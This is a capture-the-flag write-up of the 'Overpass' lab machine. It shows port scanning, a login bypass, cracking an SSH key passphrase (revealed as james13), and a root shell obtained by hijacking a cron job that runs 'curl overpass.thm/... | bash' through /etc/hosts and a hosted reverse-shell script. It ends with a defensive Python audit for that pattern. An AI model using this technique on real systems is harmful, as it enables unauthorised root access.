As usual, I started with rustscan and got these results:
Open 10.10.162.100:22
Open 10.10.162.100:80
Then I ran an nmap scan on these ports:
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 37:96:85:98:d1:00:9c:14:63:d9:b0:34:75:b1:f9:57 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDLYC7Hj7oNzKiSsLVMdxw3VZFyoPeS/qKWID8x9IWY71z3FfPijiU7h9IPC+9C+kkHPiled/u3cVUVHHe7NS68fdN1+LipJxVRJ4o3IgiT8mZ7RPar6wpKVey6kubr8JAvZWLxIH6JNB16t66gjUt3AHVf2kmjn0y8cljJuWRCJRo9xpOjGtUtNJqSjJ8T0vGIxWTV/sWwAOZ0/TYQAqiBESX+GrLkXokkcBXlxj0NV+r5t+Oeu/QdKxh3x99T9VYnbgNPJdHX4YxCvaEwNQBwy46515eBYCE05TKA2rQP8VTZjrZAXh7aE0aICEnp6pow6KQUAZr/6vJtfsX+Amn3
| 256 53:75:fa:c0:65:da:dd:b1:e8:dd:40:b8:f6:82:39:24 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMyyGnzRvzTYZnN1N4EflyLfWvtDU0MN/L+O4GvqKqkwShe5DFEWeIMuzxjhE0AW+LH4uJUVdoC0985Gy3z9zQU=
| 256 1c:4a:da:1f:36:54:6d:a6:c6:17:00:27:2e:67:75:9c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINwiYH+1GSirMK5KY0d3m7Zfgsr/ff1CP6p14fPa7JOR
80/tcp open http syn-ack Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-favicon: Unknown favicon MD5: 0D4315E5A0B066CEFD5B216C8362564B
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Overpass
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
After all that I started enumerating the website.
Since the tags given to the machine were OWASP Top 10, I started looking for OWASP vulnerabilities in the website.
On the side I started a gobuster scan and got these directories:
/img (Status: 301) [Size: 0] [ → img/]
/downloads (Status: 301) [Size: 0] [ → downloads/]
/aboutus (Status: 301) [Size: 0] [ → aboutus/]
/admin (Status: 301) [Size: 42] [ → /admin/]
/css (Status: 301) [Size: 0] [ → css/]
I went to the admin page, found a login page and started looking for SQL injection and other vulns. After some unsuccessful tries I just looked at
the Debugger tab, where I saw the login.js file. Reading through it I found something related to the session token, started playing with that, and did this:
After that I refreshed the page and got the SSH key for james.
I copied that SSH key and pasted it into a file named overpass_ssh in one of my folders, then tried to crack the SSH passphrase like this: I converted the key into a hash so that john could crack it.
I got the passphrase: james13
After that I just logged in over SSH as james:
ssh -i overpass_ssh james@10.10.162.100
The first thing I did was
sudo -l
but it asked for a password, so I didn't get anything useful. After that I tried to look for SUID files but didn't find anything useful either:
find / -type f -perm -u=s 2>/dev/null
Then I just checked the crontab and saw this:
* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash
As you can see, it downloads something from overpass.thm and pipes it into bash, as the root user. So I tried to fake the website by creating a directory with the subdirectories
downloads/src/buildscript.sh
and editing the /etc/hosts file on the victim machine
like this:
Then I made a reverse shell file on my machine named buildscript.sh and hosted it.
I hosted the downloads folder using
python3 -m http.server
and started an nc listener in another terminal.
Now, when the victim machine runs the crontab command, it downloads the file from my machine and sends a reverse shell to the attacker machine,
and I get root!
I waited for some time and got the root shell on my machine.
DONE!
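The root cause here is a root cron job that fetches a script over plain HTTP by hostname and pipes it straight into bash, so whoever controls name resolution (or the network path) controls root. As an added defender-side example, not part of this writeup or the machine, here is a small Python audit that parses a system crontab for that fetch-and-pipe-to-shell pattern and reports whether the fetched hostname is overridden in /etc/hosts. The crontab and hosts contents are constructed samples; 10.10.14.5 is a placeholder address.

```python
import re
# Constructed samples modelled on the writeup; 10.10.14.5 is a placeholder address.
SAMPLE_CRONTAB = """\
# /etc/crontab (constructed sample)
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash
*/5 * * * * backup /usr/local/bin/backup.sh
"""
SAMPLE_HOSTS = """\
127.0.0.1 localhost
10.10.14.5 overpass.thm
"""

def parse_system_crontab(text):
    """Return (user, command) for every job line in /etc/crontab-style text."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue  # comment, blank line, or environment assignment
        parts = line.split(None, 6)  # five schedule fields, user, command
        if len(parts) == 7:
            jobs.append((parts[5], parts[6]))
    return jobs

def parse_hosts(text):
    """Map each hostname in /etc/hosts-style text to its address."""
    mapping = {}
    for fields in (l.split("#", 1)[0].split() for l in text.splitlines()):
        mapping.update((name, fields[0]) for name in fields[1:])
    return mapping

def fetch_piped_to_shell(command):
    """Host fetched by curl/wget and piped into a shell, else None (flags skipped heuristically)."""
    if not re.search(r"\|\s*(?:sudo\s+)?(?:ba|da|z)?sh\b", command):
        return None
    m = re.search(r"\b(?:curl|wget)\b\s+(?:-\S+\s+)*(?:https?://)?([A-Za-z0-9.-]+)", command)
    return m.group(1) if m else None

def audit(crontab_text, hosts_text):
    """List user, host and any /etc/hosts override for jobs that pipe a remote script into a shell."""
    hosts = parse_hosts(hosts_text)
    findings = []
    for user, cmd in parse_system_crontab(crontab_text):
        host = fetch_piped_to_shell(cmd)
        if host:
            findings.append({"user": user, "host": host, "override": hosts.get(host)})
    return findings
```

Run `audit(open("/etc/crontab").read(), open("/etc/hosts").read())` on a real host; any finding with user root and a non-null override is the exact condition this box was exploited through, and the fix is to ship the script with the package or fetch it over TLS with an integrity check instead of piping an HTTP body into bash.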